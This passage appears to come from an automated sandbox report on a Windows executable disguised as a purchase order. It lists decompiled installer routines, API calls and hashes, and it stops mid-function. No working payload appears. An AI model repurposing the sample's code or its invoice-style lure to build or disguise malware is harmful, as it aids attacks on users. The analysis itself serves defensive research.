                      0x00404a4b
                      0x00404a52
                      0x00404a59
                      0x00404a63
                      0x00404a63
                      0x00404a67
                      0x00404a6c
                      0x00404a71
                      0x00404a87
                      0x00404a73
                      0x00404a73
                      0x00404a7b
                      0x00404a82
                      0x00404a7d
                      0x00404a7d
                      0x00404a7d
                      0x00404a7b
                      0x00404a8b
                      0x00404a8d
                      0x00404a9b
                      0x00404a9c
                      0x00404aa8
                      0x00404aab
                      0x00404aab
                      0x00404a6c
                      0x00000000
                      0x00404a59
                      0x00404a3d
                      0x00404a44
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00404b01
                      0x00404b01
                      0x00404b08
                      0x00404b7c
                      0x00404b83
                      0x00404b8f
                      0x00404b8f
                      0x00404b98
                      0x00404b9a
                      0x00404ba1
                      0x00404ba4
                      0x00404ba4
                      0x00404baa
                      0x00404bb1
                      0x00404bb4
                      0x00404bb4
                      0x00404bba
                      0x00404bc0
                      0x00404bc6
                      0x00404bc6
                      0x00404bd3
                      0x00404d20
                      0x00404d27
                      0x00404d44
                      0x00404d4a
                      0x00404d5c
                      0x00404d5c
                      0x00000000
                      0x00404bd9
                      0x00404bdb
                      0x00404be3
                      0x00404be7
                      0x00404be7
                      0x00404bef
                      0x00404c30
                      0x00404c32
                      0x00404c42
                      0x00404c45
                      0x00404c4a
                      0x00404c51
                      0x00404c54
                      0x00404cf6
                      0x00404cfc
                      0x00404d0a
                      0x00404d1b
                      0x00404d1b
                      0x00000000
                      0x00404d0a
                      0x00404c5a
                      0x00404c5d
                      0x00404c63
                      0x00404c68
                      0x00404c6a
                      0x00404c6c
                      0x00404c72
                      0x00404c79
                      0x00404c7e
                      0x00404c85
                      0x00404c88
                      0x00404c88
                      0x00404c8f
                      0x00404c9b
                      0x00404c9f
                      0x00404ca1
                      0x00404ca1
                      0x00404c91
                      0x00404c93
                      0x00404c93
                      0x00404cc1
                      0x00404ccd
                      0x00404cdc
                      0x00404cdc
                      0x00404cde
                      0x00404ce1
                      0x00404cea
                      0x00000000
                      0x00404bf1
                      0x00404bfc
                      0x00404bff
                      0x00404c04
                      0x00404c06
                      0x00404c0a
                      0x00404c1a
                      0x00404c24
                      0x00404c26
                      0x00404c29
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00404c0c
                      0x00404c0c
                      0x00404c12
                      0x00404c14
                      0x00404c14
                      0x00404c15
                      0x00404c16
                      0x00000000
                      0x00404c0c
                      0x00404bef
                      0x00404bd3
                      0x00404b10
                      0x00000000
                      0x00404b26
                      0x00404b30
                      0x00404b35
                      0x00000000
                      0x00000000
                      0x00404b47
                      0x00404b4c
                      0x00404b58
                      0x00404b58
                      0x00404b5a
                      0x00404b69
                      0x00404b6b
                      0x00404b72
                      0x00404b75
                      0x00000000
                      0x00404b75
                      0x00404b10
                      0x004047c6
                      0x004047cb
                      0x004047d5
                      0x004047d6
                      0x004047df
                      0x004047ea
                      0x004047f5
                      0x004047fb
                      0x00404809
                      0x0040481e
                      0x00404823
                      0x0040482e
                      0x00404837
                      0x0040484c
                      0x0040485d
                      0x0040486a
                      0x0040486a
                      0x0040486f
                      0x00404875
                      0x00404877
                      0x0040487a
                      0x0040487f
                      0x00404884
                      0x00404886
                      0x00404886
                      0x004048a6
                      0x004048a6
                      0x004048a8
                      0x004048a9
                      0x004048ae
                      0x004048b1
                      0x004048b4
                      0x004048b8
                      0x004048bd
                      0x004048c2
                      0x004048c6
                      0x004048cb
                      0x004048d0
                      0x004048d2
                      0x004048da
                      0x004049a4
                      0x004049b7
                      0x00000000
                      0x004048e0
                      0x004048e3
                      0x004048e6
                      0x004048e9
                      0x004048e9
                      0x004048ef
                      0x004048f5
                      0x004048f8
                      0x004048fe
                      0x004048ff
                      0x00404904
                      0x0040490d
                      0x00404914
                      0x00404917
                      0x0040491a
                      0x0040491d
                      0x00404959
                      0x00404982
                      0x0040495b
                      0x00404968
                      0x00404968
                      0x0040491f
                      0x00404922
                      0x00404931
                      0x0040493b
                      0x00404943
                      0x0040494a
                      0x00404952
                      0x00404952
                      0x0040491d
                      0x00404988
                      0x00404989
                      0x00404995
                      0x00404995
                      0x004049a2
                      0x004049bd
                      0x004049c1
                      0x004049de
                      0x004049e3
                      0x004049e6
                      0x00000000
                      0x004049c3
                      0x004049c8
                      0x004049d1
                      0x00404d5e
                      0x00404d70
                      0x00404d70
                      0x004049c1
                      0x00000000
                      0x004049a2
                      0x004048da

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                      • String ID: $M$N
                      • API String ID: 1638840714-813528018
                      • Opcode ID: 32139a76c024986513f02143e9fc3436abe218e466eac6ee11a08412876e8968
                      • Instruction ID: 2baebcd050ce5e3cc44cfd390f58c160629cefacb8a2130a1722bfbf049ea566
                      • Opcode Fuzzy Hash: 32139a76c024986513f02143e9fc3436abe218e466eac6ee11a08412876e8968
                      • Instruction Fuzzy Hash: 5A02B0B0A00208AFDB24DF55DC45BAE7BB5FB84315F10817AF610BA2E1C7799A42CF58
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00404275, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 266stringCOMMON
                      Download Yara Rule
                      C-Code - Quality: 78%
                      			E00404275(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				struct HWND__* _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				signed int _v44;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				CHAR* _v68;
				void _v72;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t81;
				long _t86;
				signed char* _t88;
				void* _t94;
				signed int _t95;
				signed short _t113;
				signed int _t117;
				char* _t122;
				intOrPtr* _t138;
				signed int* _t145;
				signed int _t148;
				signed int _t153;
				struct HWND__* _t159;
				CHAR* _t162;
				int _t163;

				_t81 =  *0x41fc68; // 0x0
				_v36 = _t81;
				_t162 = ( *(_t81 + 0x3c) << 0xa) + 0x424000;
				_v8 =  *((intOrPtr*)(_t81 + 0x38));
				if(_a8 == 0x40b) {
					E0040532A(0x3fb, _t162);
					E00405CE3(_t162);
				}
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040532A(0x3fb, _t162);
							if(E00405659(_t180, _t162) == 0) {
								_v8 = 1;
							}
							E00405A85(0x41f460, _t162);
							_t145 = 0;
							_t86 = E00405DA3(0);
							_v16 = _t86;
							if(_t86 == 0) {
								L31:
								E00405A85(0x41f460, _t162);
								_t88 = E0040560C(0x41f460);
								if(_t88 != _t145) {
									 *_t88 =  *_t88 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41f460,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
									_t153 = _a8;
									goto L37;
								} else {
									_t163 = 0x400;
									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
									_v12 = 1;
									goto L38;
								}
							} else {
								if(0 == 0x41f460) {
									L30:
									_t145 = 0;
									goto L31;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t113 = _v16(0x41f460,  &_v44,  &_v24,  &_v32);
									if(_t113 != 0) {
										break;
									}
									if(_t145 != 0) {
										 *_t145 =  *_t145 & _t113;
									}
									_t145 = E004055BF(0x41f460) - 1;
									 *_t145 = 0x5c;
									if(_t145 != 0x41f460) {
										continue;
									} else {
										goto L30;
									}
								}
								_t153 = (_v40 << 0x00000020 | _v44) >> 0xa;
								_v12 = 1;
								_t145 = 0;
								L37:
								_t163 = 0x400;
								L38:
								_t94 = E004046C5(5);
								if(_v12 != _t145 && _t153 < _t94) {
									_v8 = 2;
								}
								if( *((intOrPtr*)( *0x42367c + 0x10)) != _t145) {
									E00404610(0x3ff, 0xfffffffb, _t94);
									if(_v12 == _t145) {
										SetDlgItemTextA(_a4, _t163, 0x41f450);
									} else {
										E00404610(_t163, 0xfffffffc, _t153);
									}
								}
								_t95 = _v8;
								 *0x423f44 = _t95;
								if(_t95 == _t145) {
									_v8 = E0040140B(7);
								}
								if(( *(_v36 + 0x14) & _t163) != 0) {
									_v8 = _t145;
								}
								E00403E59(0 | _v8 == _t145);
								if(_v8 == _t145 &&  *0x420484 == _t145) {
									E0040420A();
								}
								 *0x420484 = _t145;
								goto L53;
							}
						}
						_t180 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t117 = _a12 & 0x0000ffff;
					if(_t117 != 0x3fb) {
						L12:
						if(_t117 == 0x3e9) {
							_t148 = 7;
							memset( &_v72, 0, _t148 << 2);
							_v76 = _a4;
							_v68 = 0x420498;
							_v56 = E004045AA;
							_v52 = _t162;
							_v64 = E00405AA7(0x3fb, 0x420498, _t162, 0x41f868, _v8);
							_t122 =  &_v76;
							_v60 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405578(_t162);
								_t125 =  *((intOrPtr*)( *0x423eb0 + 0x11c));
								if( *((intOrPtr*)( *0x423eb0 + 0x11c)) != 0 && _t162 == "C:\\Users\\jones\\AppData\\Local\\Temp") {
									E00405AA7(0x3fb, 0x420498, _t162, 0, _t125);
									if(lstrcmpiA(0x422e40, 0x420498) != 0) {
										lstrcatA(_t162, 0x422e40);
									}
								}
								 *0x420484 =  &(( *0x420484)[0]);
								SetDlgItemTextA(_a4, 0x3fb, _t162);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t159 = _a4;
					_v12 = GetDlgItem(_t159, 0x3fb);
					if(E004055E5(_t162) != 0 && E0040560C(_t162) == 0) {
						E00405578(_t162);
					}
					 *0x423678 = _t159;
					SetWindowTextA(_v12, _t162);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403E37(_t159);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403E37(_t159);
					E00403E6C(_v12);
					_t138 = E00405DA3(7);
					if(_t138 == 0) {
						L53:
						return E00403E9E(_a8, _a12, _a16);
					}
					 *_t138(_v12, 1);
					goto L8;
				}
			}






































                      0x0040427b
                      0x00404282
                      0x0040428e
                      0x0040429c
                      0x004042a4
                      0x004042a8
                      0x004042ae
                      0x004042ae
                      0x004042ba
                      0x0040432e
                      0x00404335
                      0x0040440a
                      0x00404411
                      0x00404420
                      0x00404420
                      0x00404424
                      0x0040442a
                      0x00404437
                      0x00404439
                      0x00404439
                      0x00404447
                      0x0040444c
                      0x0040444f
                      0x00404456
                      0x00404459
                      0x00404490
                      0x00404492
                      0x00404498
                      0x0040449f
                      0x004044a1
                      0x004044a1
                      0x004044bd
                      0x004044f9
                      0x00000000
                      0x004044bf
                      0x004044c2
                      0x004044d6
                      0x004044d8
                      0x00000000
                      0x004044d8
                      0x0040445b
                      0x0040445f
                      0x0040448e
                      0x0040448e
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00404461
                      0x00404461
                      0x0040446e
                      0x00404473
                      0x00000000
                      0x00000000
                      0x00404477
                      0x00404479
                      0x00404479
                      0x00404484
                      0x00404487
                      0x0040448c
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0040448c
                      0x004044e7
                      0x004044ee
                      0x004044f5
                      0x004044fc
                      0x004044fc
                      0x00404501
                      0x00404503
                      0x0040450b
                      0x00404511
                      0x00404511
                      0x00404521
                      0x0040452b
                      0x00404533
                      0x00404549
                      0x00404535
                      0x00404539
                      0x00404539
                      0x00404533
                      0x0040454e
                      0x00404553
                      0x00404558
                      0x00404561
                      0x00404561
                      0x0040456a
                      0x0040456c
                      0x0040456c
                      0x00404578
                      0x00404580
                      0x0040458a
                      0x0040458a
                      0x0040458f
                      0x00000000
                      0x0040458f
                      0x00404459
                      0x00404413
                      0x0040441a
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0040441a
                      0x0040433b
                      0x00404341
                      0x0040435b
                      0x00404360
                      0x0040436a
                      0x00404371
                      0x00404380
                      0x00404383
                      0x00404386
                      0x0040438d
                      0x00404395
                      0x00404398
                      0x0040439c
                      0x004043a3
                      0x004043ab
                      0x00404403
                      0x004043ad
                      0x004043ae
                      0x004043b5
                      0x004043bf
                      0x004043c7
                      0x004043d4
                      0x004043e8
                      0x004043ec
                      0x004043ec
                      0x004043e8
                      0x004043f1
                      0x004043fc
                      0x004043fc
                      0x004043ab
                      0x00000000
                      0x00404360
                      0x0040434e
                      0x00000000
                      0x00000000
                      0x00404354
                      0x00000000
                      0x004042bc
                      0x004042bc
                      0x004042c8
                      0x004042d2
                      0x004042df
                      0x004042df
                      0x004042e5
                      0x004042ee
                      0x004042f7
                      0x004042fa
                      0x004042fd
                      0x00404305
                      0x00404308
                      0x0040430b
                      0x00404313
                      0x0040431a
                      0x00404321
                      0x00404595
                      0x004045a7
                      0x004045a7
                      0x0040432c
                      0x00000000
                      0x0040432c

                      APIs
                      • GetDlgItem.USER32 ref: 004042C1
                      • SetWindowTextA.USER32(?,?), ref: 004042EE
                      • SHBrowseForFolderA.SHELL32(?,0041F868,?), ref: 004043A3
                      • CoTaskMemFree.OLE32(00000000), ref: 004043AE
                      • lstrcmpiA.KERNEL32(icluciob,00420498,00000000,?,?), ref: 004043E0
                      • lstrcatA.KERNEL32(?,icluciob), ref: 004043EC
                      • SetDlgItemTextA.USER32 ref: 004043FC
                        • Part of subcall function 0040532A: GetDlgItemTextA.USER32 ref: 0040533D
                        • Part of subcall function 00405CE3: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Purchase Order #5000012803.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
                        • Part of subcall function 00405CE3: CharNextA.USER32(?,?,?,00000000), ref: 00405D48
                        • Part of subcall function 00405CE3: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Purchase Order #5000012803.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
                        • Part of subcall function 00405CE3: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\Purchase Order #5000012803.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D
                      • GetDiskFreeSpaceA.KERNEL32(0041F460,?,?,0000040F,?,0041F460,0041F460,?,00000000,0041F460,?,?,000003FB,?), ref: 004044B5
                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004044D0
                      • SetDlgItemTextA.USER32 ref: 00404549
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                      • String ID: A$C:\Users\user\AppData\Local\Temp$icluciob
                      • API String ID: 2246997448-1867330012
                      • Opcode ID: 9160f627fd824642e8b844dcf08aeaa1494bcf147798ed7fcce5c5106f52e304
                      • Instruction ID: 6850db0b715ddbe2af210025c5f30c7158fed24285b7178da21f46715b177744
                      • Opcode Fuzzy Hash: 9160f627fd824642e8b844dcf08aeaa1494bcf147798ed7fcce5c5106f52e304
                      • Instruction Fuzzy Hash: BA9162B1A00218BBDF11AFA1DD85AAF77B8EF84314F10403BFB04B6291D77C9A419B59
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00405AA7, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 195stringCOMMON
                      Download Yara Rule
                      C-Code - Quality: 74%
                      			E00405AA7(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed char _v24;
				signed int _v28;
				signed int _t36;
				CHAR* _t37;
				signed char _t39;
				signed int _t40;
				int _t41;
				char _t51;
				char _t52;
				char _t54;
				char _t56;
				void* _t64;
				signed int _t68;
				signed int _t73;
				signed char _t74;
				char _t81;
				void* _t83;
				CHAR* _t84;
				void* _t86;
				signed int _t93;
				signed int _t95;
				void* _t96;

				_t86 = __esi;
				_t83 = __edi;
				_t64 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t36 =  *( *0x42367c - 4 + _t36 * 4);
				}
				_t73 =  *0x423ed8 + _t36;
				_t37 = 0x422e40;
				_push(_t64);
				_push(_t86);
				_push(_t83);
				_t84 = 0x422e40;
				if(_a4 - 0x422e40 < 0x800) {
					_t84 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t81 =  *_t73;
					if(_t81 == 0) {
						break;
					}
					__eflags = _t84 - _t37 - 0x400;
					if(_t84 - _t37 >= 0x400) {
						break;
					}
					_t73 = _t73 + 1;
					__eflags = _t81 - 0xfc;
					_a8 = _t73;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t84 = _t81;
							_t84 =  &(_t84[1]);
							__eflags = _t84;
						} else {
							 *_t84 =  *_t73;
							_t84 =  &(_t84[1]);
							_t73 = _t73 + 1;
						}
						continue;
					}
					_t39 =  *(_t73 + 1);
					_t74 =  *_t73;
					_a8 = _a8 + 2;
					_v20 = _t39;
					_t93 = (_t39 & 0x0000007f) << 0x00000007 | _t74 & 0x0000007f;
					_t68 = _t74;
					_t40 = _t39 | 0x00000080;
					__eflags = _t81 - 0xfe;
					_v28 = _t68;
					_v24 = _t74 | 0x00000080;
					_v16 = _t40;
					if(_t81 != 0xfe) {
						__eflags = _t81 - 0xfd;
						if(_t81 != 0xfd) {
							__eflags = _t81 - 0xff;
							if(_t81 == 0xff) {
								__eflags = (_t40 | 0xffffffff) - _t93;
								E00405AA7(_t68, _t84, _t93, _t84, (_t40 | 0xffffffff) - _t93);
							}
							L41:
							_t41 = lstrlenA(_t84);
							_t73 = _a8;
							_t84 =  &(_t84[_t41]);
							_t37 = 0x422e40;
							continue;
						}
						__eflags = _t93 - 0x1d;
						if(_t93 != 0x1d) {
							__eflags = (_t93 << 0xa) + 0x424000;
							E00405A85(_t84, (_t93 << 0xa) + 0x424000);
						} else {
							E004059E3(_t84,  *0x423ea8);
						}
						__eflags = _t93 + 0xffffffeb - 7;
						if(_t93 + 0xffffffeb < 7) {
							L32:
							E00405CE3(_t84);
						}
						goto L41;
					}
					_t95 = 2;
					_t51 = GetVersion();
					__eflags = _t51;
					if(_t51 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x423f24;
						if( *0x423f24 != 0) {
							_t95 = 4;
						}
						__eflags = _t68;
						if(_t68 >= 0) {
							__eflags = _t68 - 0x25;
							if(_t68 != 0x25) {
								__eflags = _t68 - 0x24;
								if(_t68 == 0x24) {
									GetWindowsDirectoryA(_t84, 0x400);
									_t95 = 0;
								}
								while(1) {
									__eflags = _t95;
									if(_t95 == 0) {
										goto L29;
									}
									_t52 =  *0x423ea4;
									_t95 = _t95 - 1;
									__eflags = _t52;
									if(_t52 == 0) {
										L25:
										_t54 = SHGetSpecialFolderLocation( *0x423ea8,  *(_t96 + _t95 * 4 - 0x18),  &_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											L27:
											 *_t84 =  *_t84 & 0x00000000;
											__eflags =  *_t84;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t84);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t56 =  *_t52( *0x423ea8,  *(_t96 + _t95 * 4 - 0x18), 0, 0, _t84);
									__eflags = _t56;
									if(_t56 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t84, 0x400);
							goto L29;
						} else {
							_t71 = (_t68 & 0x0000003f) +  *0x423ed8;
							E0040596C(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t68 & 0x0000003f) +  *0x423ed8, _t84, _t68 & 0x00000040);
							__eflags =  *_t84;
							if( *_t84 != 0) {
								L30:
								__eflags = _v20 - 0x1a;
								if(_v20 == 0x1a) {
									lstrcatA(_t84, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E00405AA7(_t71, _t84, _t95, _t84, _v20);
							L29:
							__eflags =  *_t84;
							if( *_t84 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t51 - 0x5a04;
					if(_t51 == 0x5a04) {
						goto L12;
					}
					__eflags = _v20 - 0x23;
					if(_v20 == 0x23) {
						goto L12;
					}
					__eflags = _v20 - 0x2e;
					if(_v20 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t84 =  *_t84 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00405A85(_a4, _t37);
			}





























                      0x00405aa7
                      0x00405aa7
                      0x00405aa7
                      0x00405aad
                      0x00405ab2
                      0x00405ac3
                      0x00405ac3
                      0x00405ace
                      0x00405ad0
                      0x00405ad5
                      0x00405ad8
                      0x00405ad9
                      0x00405ae0
                      0x00405ae2
                      0x00405ae8
                      0x00405aeb
                      0x00405aeb
                      0x00405cc0
                      0x00405cc0
                      0x00405cc4
                      0x00000000
                      0x00000000
                      0x00405af8
                      0x00405afe
                      0x00000000
                      0x00000000
                      0x00405b04
                      0x00405b05
                      0x00405b08
                      0x00405b0b
                      0x00405cb3
                      0x00405cbd
                      0x00405cbf
                      0x00405cbf
                      0x00405cb5
                      0x00405cb7
                      0x00405cb9
                      0x00405cba
                      0x00405cba
                      0x00000000
                      0x00405cb3
                      0x00405b11
                      0x00405b15
                      0x00405b1a
                      0x00405b29
                      0x00405b2c
                      0x00405b2e
                      0x00405b33
                      0x00405b36
                      0x00405b39
                      0x00405b3c
                      0x00405b3f
                      0x00405b42
                      0x00405c5d
                      0x00405c60
                      0x00405c90
                      0x00405c93
                      0x00405c98
                      0x00405c9c
                      0x00405c9c
                      0x00405ca1
                      0x00405ca2
                      0x00405ca7
                      0x00405caa
                      0x00405cac
                      0x00000000
                      0x00405cac
                      0x00405c62
                      0x00405c65
                      0x00405c7a
                      0x00405c81
                      0x00405c67
                      0x00405c6e
                      0x00405c6e
                      0x00405c89
                      0x00405c8c
                      0x00405c55
                      0x00405c56
                      0x00405c56
                      0x00000000
                      0x00405c8c
                      0x00405b4a
                      0x00405b4b
                      0x00405b51
                      0x00405b53
                      0x00405b6d
                      0x00405b6d
                      0x00405b74
                      0x00405b74
                      0x00405b7b
                      0x00405b7f
                      0x00405b7f
                      0x00405b80
                      0x00405b82
                      0x00405bbb
                      0x00405bbe
                      0x00405bce
                      0x00405bd1
                      0x00405bd9
                      0x00405bdf
                      0x00405bdf
                      0x00405c3b
                      0x00405c3b
                      0x00405c3d
                      0x00000000
                      0x00000000
                      0x00405be3
                      0x00405bea
                      0x00405beb
                      0x00405bed
                      0x00405c07
                      0x00405c15
                      0x00405c1b
                      0x00405c1d
                      0x00405c38
                      0x00405c38
                      0x00405c38
                      0x00000000
                      0x00405c38
                      0x00405c23
                      0x00405c2e
                      0x00405c34
                      0x00405c36
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00405c36
                      0x00405bef
                      0x00405bf2
                      0x00000000
                      0x00000000
                      0x00405c01
                      0x00405c03
                      0x00405c05
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00405c05
                      0x00000000
                      0x00405c3b
                      0x00405bc6
                      0x00000000
                      0x00405b84
                      0x00405b89
                      0x00405b9f
                      0x00405ba4
                      0x00405ba7
                      0x00405c44
                      0x00405c44
                      0x00405c48
                      0x00405c50
                      0x00405c50
                      0x00000000
                      0x00405c48
                      0x00405bb1
                      0x00405c3f
                      0x00405c3f
                      0x00405c42
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00405c42
                      0x00405b82
                      0x00405b55
                      0x00405b59
                      0x00000000
                      0x00000000
                      0x00405b5b
                      0x00405b5f
                      0x00000000
                      0x00000000
                      0x00405b61
                      0x00405b65
                      0x00000000
                      0x00405b67
                      0x00405b67
                      0x00000000
                      0x00405b67
                      0x00405b65
                      0x00405cca
                      0x00405cd4
                      0x00405ce0
                      0x00405ce0
                      0x00000000

                      APIs
                      • GetVersion.KERNEL32(?,0041FC70,00000000,00404E5B,0041FC70,00000000), ref: 00405B4B
                      • GetSystemDirectoryA.KERNEL32(icluciob,00000400), ref: 00405BC6
                      • GetWindowsDirectoryA.KERNEL32(icluciob,00000400), ref: 00405BD9
                      • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405C15
                      • SHGetPathFromIDListA.SHELL32(00000000,icluciob), ref: 00405C23
                      • CoTaskMemFree.OLE32(00000000), ref: 00405C2E
                      • lstrcatA.KERNEL32(icluciob,\Microsoft\Internet Explorer\Quick Launch), ref: 00405C50
                      • lstrlenA.KERNEL32(icluciob,?,0041FC70,00000000,00404E5B,0041FC70,00000000), ref: 00405CA2
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                      • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$icluciob
                      • API String ID: 900638850-73990308
                      • Opcode ID: 8c89faea656f75211a43bdfb02caabddeac7d8c4cf190b1a32756d1be722affe
                      • Instruction ID: 02e69832ec688910c0edf1e4f77165a8fa6b6d990b95ba5e8d1c2d1c59892890
                      • Opcode Fuzzy Hash: 8c89faea656f75211a43bdfb02caabddeac7d8c4cf190b1a32756d1be722affe
                      • Instruction Fuzzy Hash: B251E371A08B19ABEB215B64CC84BBF3B74EB15714F14023BE911BA2D0D37C5982DE4E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00402012, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134comCOMMON
                      Download Yara Rule
                      C-Code - Quality: 74%
                      			E00402012() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E004029E8(0xfffffff0);
				_t96 = E004029E8(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x2c)) = E004029E8(2);
				 *((intOrPtr*)(_t100 - 8)) = E004029E8(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x44)) = E004029E8(0x45);
				if(E004055E5(_t96) == 0) {
					E004029E8(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407384, _t75, 1, 0x407374, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
